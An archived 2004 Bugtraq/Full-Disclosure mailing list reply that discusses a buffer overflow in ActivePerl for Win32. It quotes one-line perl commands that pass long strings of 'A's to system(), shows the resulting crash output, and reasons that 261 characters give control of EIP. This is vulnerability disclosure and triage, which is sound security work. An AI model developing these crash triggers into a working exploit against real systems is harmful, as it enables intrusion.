lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Wed, 19 May 2004 01:29:41 +1200 From: Nick FitzGerald <nick@...us-l.demon.co.uk> To: bugtraq@...urityfocus.com, full-disclosure@...ts.netsys.com Subject: Re: Buffer Overflow in ActivePerl ? "Oliver@...yhat.de" <Oliver@...yhat.de> wrote: > i played around with ActiveState's ActivePerl for Win32, and crashed > Perl.exe with the following command: > > perl -e "$a="A" x 256; system($a)" Ditto -- "v5.8.0 built for MSWin32-x86-multi-thread" on Win2K SP4 plus all but last week's security patch: perl -e "$a="A" x 256; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x00657865. The memory could not be "written". Also, it is likely exploitable -- push up the number of A's a bit: C:\>perl -e "$a="A" x 259; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x65004141. The memory could not be "written". and we seem to get control of EIP. Coincidence? Try yet two more: C:\>perl -e "$a="A" x 261; system($a)" perl.exe - Application error Unhandled instruction at "0x77fcc83d" referenced memory at "0x41414141. The memory could not be "written". Looks like full control of EIP... However, there is not likely to be a privilege escalation here unless perhaps a script processor on a web server can be cajoled into doing something with this?? (Not at all familiar with the innards of Windows web servers and their relationship to their CGI, etc processors...) -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists